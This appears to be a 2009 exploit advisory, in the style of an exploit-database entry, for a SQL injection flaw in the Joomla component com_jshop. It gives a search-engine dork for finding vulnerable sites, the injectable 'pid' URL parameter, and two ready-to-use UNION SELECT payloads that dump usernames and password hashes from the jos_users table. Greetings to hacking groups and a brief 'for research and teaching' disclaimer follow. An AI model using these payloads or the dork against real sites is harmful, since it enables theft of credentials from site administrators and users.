44 lines
No EOL
1.7 KiB
Text
44 lines
No EOL
1.7 KiB
Text
/**************************************************************************
|
|
|
|
[~] Joomla Component com_jshop SQL Injection Vulnerability
|
|
[~] Author : Don Tukulesto (root@indonesiancoder.com)
|
|
[~] Homepage : http://www.indonesiancoder.com
|
|
[~] Date : October 23, 2009
|
|
[~] Tune In : http://antisecradio.fm (choose your weapon)
|
|
|
|
**************************************************************************/
|
|
|
|
[+] Dork : inurl:"kaMtiEz"+"tukulesto"
|
|
[+] Price : FREE (Open Source Content Management)
|
|
|
|
[ Vulnerable File ]
|
|
|
|
http://127.0.0.1/index.php?option=com_jshop&view=product&family=INDONESIANCODER&group=0&pid=[ExpL0!7]
|
|
|
|
[ ExpL0!7 ]
|
|
|
|
-12+union+select+6,6,@@version,concat(0x3a,username,password),6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6+from+jos_users--
|
|
|
|
-12/**/UNION/**/SELECT/**/6,username,concat(0x3a,username,password),@@version,6,6,6,6,6,6,6,6,6,6,6,6,6,password,6,6/**/from/**/jos_users/*
|
|
|
|
===========================================================================
|
|
|
|
[ Gracias ]
|
|
|
|
[+] In the Name of ALLAH, Most Gracious, Most Merciful.
|
|
[+] INDONESIAN CODER TEAM - KILL-9 CREW - Anti Security - MainHack Brotherhood - ServerIsDown
|
|
[+] kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Jack-, Yadoy666
|
|
[+] Contrex, alsastrow, TUCKER, IAN PETRUCII, Cyb3r_tr0n, M364TR0N, Gonzhack, SAINT, Ronz
|
|
[+] XNITRO, DraCoola Multimedia, AWAN Bejat, Plaque, rey_cute, Gh4mb4s, noname, SurabayaHackerLink
|
|
[+] #nusantarahacker, #becak, #indonesiancoder, #kill-9, #becak, and YOU!!
|
|
|
|
[ NOTE ]
|
|
|
|
[!] The following procedures (methods) may contain something offensive
|
|
[!] Only for security researches and teaching , at your own risk!
|
|
|
|
[ QUOTE ]
|
|
|
|
[+] Mom and Father and my sister i love u
|
|
[+] Mencari si Anak Hilang ...
|
|
[+] Kapan saya nikan sama Sanny Aura Syahrani? Ya ALLAH, tolonglah daku ! |